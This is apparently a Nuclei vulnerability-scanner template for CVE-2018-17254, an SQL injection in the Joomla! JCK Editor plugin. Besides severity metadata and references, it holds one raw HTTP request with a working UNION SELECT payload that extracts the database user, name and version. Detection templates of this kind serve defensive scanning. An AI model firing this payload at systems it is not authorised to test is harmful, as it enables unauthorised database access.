43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2018-17254
|
|
|
|
info:
|
|
name: Joomla! JCK Editor SQL Injection
|
|
author: Suman_Kar
|
|
severity: critical
|
|
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
|
remediation: Update or remove the affected plugin.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
|
|
- https://www.exploit-db.com/exploits/45423/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-17254
|
|
cwe-id: CWE-89
|
|
epss-score: 0.81793
|
|
epss-percentile: 0.98041
|
|
cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: arkextensions
|
|
product: jck_editor
|
|
framework: joomla\!
|
|
tags: cve,cve2018,packetstorm,edb,joomla,sqli
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: {{BaseURL}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{{md5(num)}}'
|
|
|
|
# digest: 4b0a00483046022100fa2b6fb534177b61390cfba00fe351f6c98d537a4da23d6eafe0f17816cd4f9702210097043f7f4eb7bfd52955e21f4d95644ef5d97117bb871c1b996f41b12c9526fa:922c64590222798bb761d5b6d8e72950
|